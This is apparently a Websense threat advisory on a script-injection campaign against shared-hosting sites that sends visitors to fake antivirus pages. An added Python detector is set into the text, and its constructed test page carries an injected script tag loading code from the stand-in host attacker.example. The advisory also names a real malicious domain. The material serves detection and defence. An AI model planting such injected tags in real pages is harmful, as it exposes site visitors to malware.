Rogue AV Injection Campaign Targeting Web Hosting Networks
Websense® Security Labs™ ThreatSeeker™ Network has discovered a mass injection attack targeting Web hosting networks that is spreading in the wild. Users who visit a compromised site are redirected to rogue AV sites.
Websense ThreatSeeker Network recently detected a large-scale outbreak of the campaign. The targets are four well-known Web hosting providers: BlueHost, DreamHost, Bizland and Go Daddy. According to our statistics, approximately 38% of the compromised sites in this campaign are hosted on BlueHost, and nearly 97% of the sites compromised by the attack are hosted by one of these four companies.
The chart below shows the number of compromised sites we monitored over the last week:
Below is the distribution of compromised sites across the hacked Web hosting companies:
The cybercriminals use similar injections on every compromised site: a script tag whose src points to a PHP file on an attacker-controlled domain is appended at the bottom of each compromised page, as shown below:
The major injected URLs used in the attack are:
Most of the above domains were registered between May and July by the same registrant using two free e-mail accounts. From the payloads we found that they all redirect to rogue AV pages whose domains are under .co.cc.
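The injection pattern described above (an external script tag pointing at a .php file, appended after the page's real content) is easy to sweep for across a web root, and the .co.cc hostnames of the landing pages are a cheap second check. The scanner below is an added example and not code from the Websense post: it parses each page, flags every `<script src>` whose target is an external .php URL or that sits after the closing `</html>` tag, and separately tests whether a redirect target lives under .co.cc. The sample pages, the `attacker.example` domain, the `shop.example` site name and the CDN allow-list are all constructed for the example.

```python
"""Sweep HTML pages for injected external <script src="...php"> tags.

Added example for the Websense rogue AV write-up; the pages, domains and
allow-list below are constructed, not indicators from the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages. The clean page loads its own JS plus a known CDN.
CLEAN_PAGE = """<html><head><title>Shop</title>
<script src="/js/app.js"></script>
<script src="https://cdn.example.org/jquery.min.js"></script>
</head><body><p>hello</p></body></html>
"""

# Same page with an injected tag appended after </html>, mimicking the
# "PHP link in a script tag at the bottom of the page" pattern.
INJECTED_PAGE = CLEAN_PAGE + (
    '<script src="http://attacker.example/count.php?id=7"></script>\n'
)

# Assumption: hosts the site legitimately loads scripts from.
ALLOWED_HOSTS = {"cdn.example.org"}


class ScriptSrcParser(HTMLParser):
    """Collect every <script src=...> and whether it appeared after </html>."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # list of (src, seen_after_html_close)
        self._html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append((src, self._html_closed))

    def handle_endtag(self, tag):
        if tag == "html":
            self._html_closed = True


def find_suspicious_scripts(html, site_host, allowed_hosts=ALLOWED_HOSTS):
    """Return [{'src': ..., 'reasons': [...]}] for script tags worth a look.

    A tag is reported if its src is an external (not site_host, not
    allow-listed) URL ending in .php, or if it was injected after </html>.
    """
    parser = ScriptSrcParser()
    parser.feed(html)
    parser.close()

    hits = []
    for src, after_close in parser.scripts:
        url = urlparse(src)
        host = (url.hostname or "").lower()
        reasons = []
        external = host and host != site_host.lower() and host not in allowed_hosts
        if external and url.path.lower().endswith(".php"):
            reasons.append("external .php script")
        if after_close:
            reasons.append("appended after </html>")
        if reasons:
            hits.append({"src": src, "reasons": reasons})
    return hits


def is_co_cc_host(url):
    """True if the URL's host is a .co.cc name (the landing-page pattern)."""
    host = (urlparse(url).hostname or "").lower()
    return host == "co.cc" or host.endswith(".co.cc")


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for hit in find_suspicious_scripts(page, "shop.example"):
            print(f"{label}: {hit['src']} -> {', '.join(hit['reasons'])}")
    print("co.cc landing:", is_co_cc_host("http://scan-now.co.cc/index.php"))
```

Run it over a checkout of the web root (one `find_suspicious_scripts` call per file, with the site's real hostname and CDN list) rather than over live pages, so a conditional payload that only fires for certain User-Agents or referrers cannot hide the injection from the scan.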
Below is one of the payloads from whereisdudescars.com:
The payload redirects the user to a rogue AV site that pushes a fake antivirus installer; at the time of analysis the sample had low detection coverage on VirusTotal.
Websense TRITON Advanced Classification Engine (ACE) is protecting customers against this attack. We will continue to monitor the campaign and update this alert.